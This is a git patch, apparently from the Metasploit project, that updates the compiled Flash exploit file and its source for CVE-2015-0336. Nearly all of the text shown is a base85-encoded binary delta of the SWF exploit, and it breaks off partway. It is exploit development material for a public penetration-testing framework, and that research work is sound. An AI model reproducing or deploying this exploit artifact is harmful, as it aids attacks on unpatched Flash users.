From 801deeaddf9e2478fce0b0a85b8c9d2e57997e88 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 26 May 2015 17:20:49 -0500 Subject: [PATCH 1/3] Fix CVE-2015-0336 --- data/exploits/CVE-2015-0336/msf.swf | Bin 18060 -> 18121 bytes external/source/exploits/CVE-2015-0336/Msf.as | 7 +++++-- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf index 4a080464a1976c24c6aadb2ed1fad6110bf9983e..97b6ffe99c8b2f00fb4196a19f6bd600601dfc99 100755 GIT binary patch delta 17980 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 